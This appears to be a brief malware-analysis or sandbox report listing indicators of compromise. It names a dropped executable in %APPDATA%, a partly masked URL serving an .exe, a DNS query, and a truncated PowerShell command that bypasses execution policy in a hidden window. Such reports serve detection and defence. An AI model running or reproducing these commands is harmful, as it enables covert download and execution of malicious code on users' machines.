Technical Information
- '%APPDATA%\dlyxrf.exe'
- %APPDATA%\dlyxrf.exe
- http://do##a.games/19.exe
- DNS ASK do##a.games
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -WindowStyle hidden -nologo $kMfLnTnVDLqQpks = [System.Environment]::OSVersion.Version | Select -Expand Major;$AMrxOauF = [System.Environment]::OSVersion.Version | Selec...' (with hidden window)